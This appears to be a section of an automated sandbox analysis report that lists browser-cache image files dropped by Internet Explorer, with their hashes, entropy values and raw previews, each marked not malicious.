                                                                                                                                                                                                  Size (bytes):5608
                                                                                                                                                                                                  Entropy (8bit):7.895085967572364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGAaECEmgaHKnDtqwo56E0SwJRPgp+l4dAlEHmTh2e6OYs8PiEw52:BCKmzlp6E5RpO4ulVh2ZHPiEF
                                                                                                                                                                                                  MD5:23937A58FF272168594E9F48FC20BB9B
                                                                                                                                                                                                  SHA1:DA787CE04DE9C1D5BA7D27325CA8449E38A481D9
                                                                                                                                                                                                  SHA-256:436471B724B0FD7FB0570E7AE05BFECA23529F5D136E57C53E87F8CABEA7A741
                                                                                                                                                                                                  SHA-512:03B1FF4E066574A62136BECE26CF940E8D791D1C3A7E758FFDE98C831A86B1F8ADD7ABD7C29DA1FDEDEDA41208B2F84F56E373BDADFAD56FFAE429398E5E041C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..^...4.s\..ZZ(.!))...IN.4..M4.M4.0..<...c.0.0.@5.3NcQ..b.Dh.8D.&..O;.A.=.kA.@.W....k.........8....q....J`&)E...QO...<S..4.Q/."..(.R....B..KI@...u4...L4.Q.L.&.cN&.cHcX.li.j&4.F4.-.....*KkV.l.uj.H.$...SHM..$.=.>...CTH.CKHh.(..b.J..S..(..AN..M[#...J..nb..0...W..s...hN.N.T.S..H..u4....i.&...1.8....5.D..c@...-..Dc..-,..I/....L.P...Ji........:.HiM%Q".i..m..E.(
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1blWRP[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5310
                                                                                                                                                                                                  Entropy (8bit):7.889789093379302
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGAaE9J76H2K4QvgA7l0ZI7TXajBUB1Kp0gPllnNOV/CiPIS/HB6iFO30CvjIjt:BCUk2K4QB50ZI7TKU8vPnnUV/BxB66OC
                                                                                                                                                                                                  MD5:124428AE0AFA25ABF625A457820FBEF6
                                                                                                                                                                                                  SHA1:C6D5C40A8DF5257D0521B1C9F6935A562800D4F2
                                                                                                                                                                                                  SHA-256:0FFFB9062D9264E6D6CE2D7C0A146BBD7A7E3185C2CB23F1B0CFEFEBB5C76DD4
                                                                                                                                                                                                  SHA-512:41A4F38010A509F803A319CDD1D2E1DA53AD95DA9919B2D24375EBD0B1603DE3FB47F303DFB96AA82D08AC53448B18ADCA46134E2013A6671AB62DF52811674E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..DLjE.....c..R(.y..u...A.;S..DPI.*6......X..#+i.fj..=8.....i.d.DY..jq.Ap.1.XEH.E0.).a@.p(,.Ui.Fd'..-.....&...2f.......x...`.OX.`..m.#.N.O.&h..)A..u4..yzil.q@...&..(.......).~vu...I.j.'?1...r...1....t....^.xa...2..0.\f.F.J.E..e.v.........$\.Z.R...;.....K.....h.......J.f(.O...`AO.)i3@..KM........&..yji4.......Z.(...@.R.LE#1.1H......t:..g].^Sg...U..<..U..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1blp43[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16709
                                                                                                                                                                                                  Entropy (8bit):7.9363409098152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e92mQnMW5mcvGxSeM85Ky9IaV8L98gNA2Pez+63tEvqwpBkaFtU:e93QbmzBMUFIa+2gZJoESwpBkaY
                                                                                                                                                                                                  MD5:F332381DC68E8F5911E06253F5B5F135
                                                                                                                                                                                                  SHA1:3DF4C7087D249094F204FDD924337FE181022DAD
                                                                                                                                                                                                  SHA-256:DBE0C5B51E28077B620EFC4185B1EA5E90FD2B55D892A64CBB7D9F9E2C0AE4F3
                                                                                                                                                                                                  SHA-512:DDB52A9CDD1C94C68A7402B55A681E810BBB77E4F4FF79571DD6ECC25ACA19E2C48999F417CBC5204618ED605AEF214A757A82A1EE8F1EF585B35228CE8C8931
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..WV..q*....q......].24..KP.6..94....#=i.H..h..Y.Q:..r..b.+.@.,`\'......eA...b)..rG.Z.4..Qh...r...2O...j....H...v.&..k_#z..r..OB8...A........C.0P.7<.7n...-..a.6. .|t5..Q...21..RC...#..~...zHdp..m.(.......ra.<.e.G....B.R..^.....f....9.5....i.T.........m.....g2:.. .....(.k9........*FJe.XL..^...X..p.<........Jtm...W=I=.......Wp.z.V.T...c>.F.8.s...]6j.e..<.@-....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1bm5wu[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5764
                                                                                                                                                                                                  Entropy (8bit):7.904438238911407
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGAaEHv1YXwiyLmkN4M18C0Zy/Buo+hiO1IzYgP+MueQcnirJ43H0:BCYvPqkCK8C0Zy/Yo2HiuXmW430
                                                                                                                                                                                                  MD5:B56569E2F5B37DC028990F49EC207BE1
                                                                                                                                                                                                  SHA1:6BE5C2CCE90F68A4BF6D9ACA77085CE6C9D601A5
                                                                                                                                                                                                  SHA-256:4CD7435346D4ACC8A3891865453FD9F691204D5D6978B6F4D00FAC2597CCEB2D
                                                                                                                                                                                                  SHA-512:18BC2BCB257F279585DC824B149F9A81360941FD6178898573AA21205837F07D7A8D243395E46F21B4B21268AAD111A91DAEF2E7ACEEC623266779D0047277D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....6]Z?...........B..>....(.5....1x.'@Fv....zS..~.2h.2..i....85....X..X/u.../..I....K.FC..c...I..7|.$..^3......9.$!H....T.v'v.(.q....q.....T'.d. ;.q .....REv.1K......hC&".t}@'..i.....3o'...j...7..=...!..z.qO.C,@.........J..z..J..'@s..o......u...?*.....^.....%~..C6....u$..[....?.\..`X.\q....}>.B91v.7.......?.I;f5...Xg.?...&.{..G""0f...b...b..\.#l..<c..TZLL....V
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1bm61Z[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11008
                                                                                                                                                                                                  Entropy (8bit):7.90922531541651
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Bb6OiA5SmtQKrZCcN8ptP8GCjZq8Edc0pwe44flY/ngEYA7xrfTL2PZAcXu56a/y:ZhTShYZviptPsVq8Ey4DIl3/Mb
                                                                                                                                                                                                  MD5:11E7F539A116D755F044A951E94B3136
                                                                                                                                                                                                  SHA1:7412E20C2EE3797C86B06A8AA3CC3CF75999A8C4
                                                                                                                                                                                                  SHA-256:6FAE624AD07CAE0B38546798881E6E4B9E05A7CC67B05409D0A5AB57719EC3B6
                                                                                                                                                                                                  SHA-512:83BE1C0F2EDFE4259835F51FBAEC2325FE7105D7BB9BC7DAF292DD808BD73390354D9249999DA24243390215F3E5B26291284792F841356D030C405F8A8EBCD3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......c.D.......5b.....".e....??..RL.i..L..TQ.V#|.qV"...l.LC&O1..:UH..`...;.......4K".#+.Y....?..&.........R......Q..i.hL..M.+{.H.+..S.1L.=*....g.U.......z......@..VPb:.9sV.E.HLz.K.I.)..4.qL.f...5*.@9..P ...zQ#om...\s.S.*...c.N(v....?1."X.h..i..4.Ri...(...K.8<..l..$.6..Uf........../".qP.c:..)Us..i.C...............ZR.8..P.r).v1.yL.7c.V.i..f...R.Rr{.F\)#.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1bmewD[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                  Entropy (8bit):7.8092386527861555
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:BGpuERAUPUAkBEDJzLhjFnxGFjCHvtltI:BGAE1rkmLtFnxM+HVTI
                                                                                                                                                                                                  MD5:974B58EB6E0EAE0D364654ADAB0EC395
                                                                                                                                                                                                  SHA1:CF63B645B30BC34928C7F04628BD2E0B77A75ABC
                                                                                                                                                                                                  SHA-256:CA842A94D015C534B95E967204D23FA8FE986E32303B109453D2825811BA23A7
                                                                                                                                                                                                  SHA-512:97C3C63678DB9EF0D218D0106D7A85D835096774077B8341150412B2AEB79B291A47BD3FF0925699885D3887CAA53647509E7D2BEF0D667D8C87F95E069F6A3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...m.......s.u.9....|n....$j\...W..Wd[P.1.W.+.../;.g...%.I..9.'...q..X..+N......e.G.....5..D..SE.Y.*Cg"....0B~d..X...pE.VcN...Zb!..zT..F.j.</a...1.j.x|....N.a.&.-..B.D....}*.... u.]z.Vk..ks....;c..<Ol..M.RF...`......*.'..9.d.M..[.h.AB..+K......FMI...5......*/1%..K..>..J.t.b.....;.B..}O.+..L.........RL.M.l`c.@...\U.(.P]N.H.;.o5e...A$.G8..>..X..O..Z^.m)
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBK9Ri5[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):527
                                                                                                                                                                                                  Entropy (8bit):7.3239256100568495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6T+siLF44aPcb1z4+uzUomyawaTcQwvJ4MWX9w:U/6q4PU5Wmy0G4MKi
                                                                                                                                                                                                  MD5:3C1367514C52C7FA2A6B2322096AA4C1
                                                                                                                                                                                                  SHA1:25104E643189C1457A3916E38D7500A48FEEC77C
                                                                                                                                                                                                  SHA-256:6FAD7471DE7E6CD862193B98452DED4E71F617CDC241AFBCF372235B89F925CC
                                                                                                                                                                                                  SHA-512:1EB9B1C27025B4A629D056FDE061FC61ACB7A671ACB82BDC4B1354D7C50D4E02D34F520468F26BA060C3F9239C398D23834FF976CFFA12C4CEE3DB747C366D2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.A........ i..r0.\\.....hkkq..1h.[s..%.Fu. h)..B...].w.....8...{~...U *Q.....y.$.g...BM....EZi....j.F.c..e5.+...w;T.......<p.......".:$[8....P..*dH...$.......GO%qC.X..`MB.....!.....XcP338.>Q@3.S..y..NP..../|...f..[..r...F...9...N..S..0Q..m.<.^...>..l...A...6.}....:....^..P...5R...@:U....hN.8.....>....L~.T.&?S.X...0.m.C.,X..A%......X..!.m1.)T..O.*...'.....@.{.]....hF...,..FIY.y%M?;.u....8K6..../Bi|..?C.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBO5Geh[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):463
                                                                                                                                                                                                  Entropy (8bit):7.261982315142806
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6T+syMxsngO/gISwEIxclfcwbKMG4Ssc:U/6engigHDm7kNGhsc
                                                                                                                                                                                                  MD5:527B3C815E8761F51A39A3EA44063E12
                                                                                                                                                                                                  SHA1:531701A0181E9687103C6290FBE9CCE4AA4388E3
                                                                                                                                                                                                  SHA-256:B2596783193588A39F9C74A23EE6CA2A1B81F54B735354483216B2EDF1E72584
                                                                                                                                                                                                  SHA-512:0A3E25D472A00FF882F780E7DF1083E4348BCE4B6058DA1B72A0B2903DBC2C53CED08D8247CDA53CE508807FD034ABD8BC5BBF2331D7CE899D4F0F11FD199E0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................dIDAT8O.J.A.......,.....v"".....;X.6..J.A,D.h:El...F,lT..DSe.#..$i..3..o.6..3gf..+..\....7..X..1...=.....3.......Y.k-n....<..8...}...8.Rt...D..C).)..$...P....j.^.Qy...FL3...@...yAD...C.\;o6.?.D|..n.~..h....G2i....J.Zd.c.SA....*...l.^P.{....$\..BO.b.km.A.... ...]|.o_x^. .b.Ci.I.e2.....[*..]7.%P61.Q.d...p...@.00..|`...,..v..=.O.0.u.....@.F.......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBVuddh[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):304
                                                                                                                                                                                                  Entropy (8bit):6.758580075536471
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                                                                                                                                  MD5:245557014352A5F957F8BFDA87A3E966
                                                                                                                                                                                                  SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                                                                                                                                  SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                                                                                                                                  SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.|?.....r.\-Ca......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBX2afX[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):688
                                                                                                                                                                                                  Entropy (8bit):7.578207563914851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
                                                                                                                                                                                                  MD5:09A4FCF1442AD182D5E707FEBC1A665F
                                                                                                                                                                                                  SHA1:34491D02888B36F88365639EE0458EDB0A4EC3AC
                                                                                                                                                                                                  SHA-256:BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
                                                                                                                                                                                                  SHA-512:2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(*.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........*./.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBXXVfm[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):823
                                                                                                                                                                                                  Entropy (8bit):7.627857860653524
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
                                                                                                                                                                                                  MD5:C457956A3F2070F422DD1CC883FB4DFB
                                                                                                                                                                                                  SHA1:67658594284D733BB3EE7951FE3D6EE6EB39C8E2
                                                                                                                                                                                                  SHA-256:90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
                                                                                                                                                                                                  SHA-512:FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o.*..0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.*8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V*...u...cM..}....r\.!.J>%......8f"....q.|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...|.E.zp............>f..<*z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h*.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?*5e......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBY7ARN[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):778
                                                                                                                                                                                                  Entropy (8bit):7.591554400063189
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6TiO53VscuiflpvROsc13pPaOSuTJ8nKB8P9FekVA7WMZQ4CbAyvK0A:U/6WO5Fs2dBRGQOdl8Y8PHVA7DQ4CbX0
                                                                                                                                                                                                  MD5:7AEA772CD72970BB1C6EBCED8F2B3431
                                                                                                                                                                                                  SHA1:CB677B46C48684596953100348C24FFEF8DC4416
                                                                                                                                                                                                  SHA-256:FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
                                                                                                                                                                                                  SHA-512:E245EF217FA451774B6071562C202CA2D4ACF7FC176C83A76CCA0A5860416C5AA31B1093528BF55E87DE6B5C03C5C2C9518AB6BF5AA171EC658EC74818E8AB2E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OMS[k.Q..v.....)&V*.*"./(H. U..|P,.....DP.}...bA.A|.....J..k.5Mj..ic...^.3.Mq..33;.\....*..EK8.".2x.2.m;.}."..V...o..W7.\.5P...p.........2..+p..@4.-...R..{....3..#.-.. .E.Y....Z..L ..>z...[.F...h.........df_...-....8..s*~.N...|...,..Ux.5.FO#...E4.#.#.B.@..G.A.R._. .."g.s1.._@.u.zaC.F.n?.w.,6.R%N=a....B:.Z.UB...>r..}.....a.....\4.3.../a.Q.......k<..o.HN.At.(../)......D*...u...7o.8|....b.g..~3...Y8sy.1IlJ..d.o.0R]..8...y,\...+.V...:?B}.#g&.`G.........2.......#X.y).$..'.Z.t.7O.....g.J.2..`..soF...+....C.............z.....$.O:./...../].]..f.h*W.....P....H.7..Qv...rat....+.(..s.n..w...S...S...G.%v.Q.aX.h.4....o.~.nL.lZ..6.=...@..?.f.H...[..I)..["w..r.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\RE1Mu3b[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4054
                                                                                                                                                                                                  Entropy (8bit):7.797012573497454
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                                                                                                  MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                                                                                                  SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                                                                                                  SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                                                                                                  SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\b93e9132-e670-4998-95ce-f937ea9eeb4b[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56757
                                                                                                                                                                                                  Entropy (8bit):7.968257758404735
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:hRQtj0Q3gYOo0H6eJr9I3XpJnhFMAI8VTjdMvobT3iX0rzcAz:hR20PYOo0aqmJnhFMv8VT6vy80lz
                                                                                                                                                                                                  MD5:CD32C668C2D5C2571E00169CAF37EDEC
                                                                                                                                                                                                  SHA1:25F22FA9DD7FFCAD9CF147CEC16B77DA87315C57
                                                                                                                                                                                                  SHA-256:C0004E181AFCC01801CAA5DEB4B05E5A1B697CB6655A91D6BCBAE8874D74C02F
                                                                                                                                                                                                  SHA-512:BDEDADDC3BB440C5C3C5CE09C72F46B976979F871546A85836B7D0FCC697E13CC55E4BECC7B37D578357D82601095AF8FD85EDEAA4F274AA0936FC806D0E4782
                                                                                                                                                                                                  Malicious:false
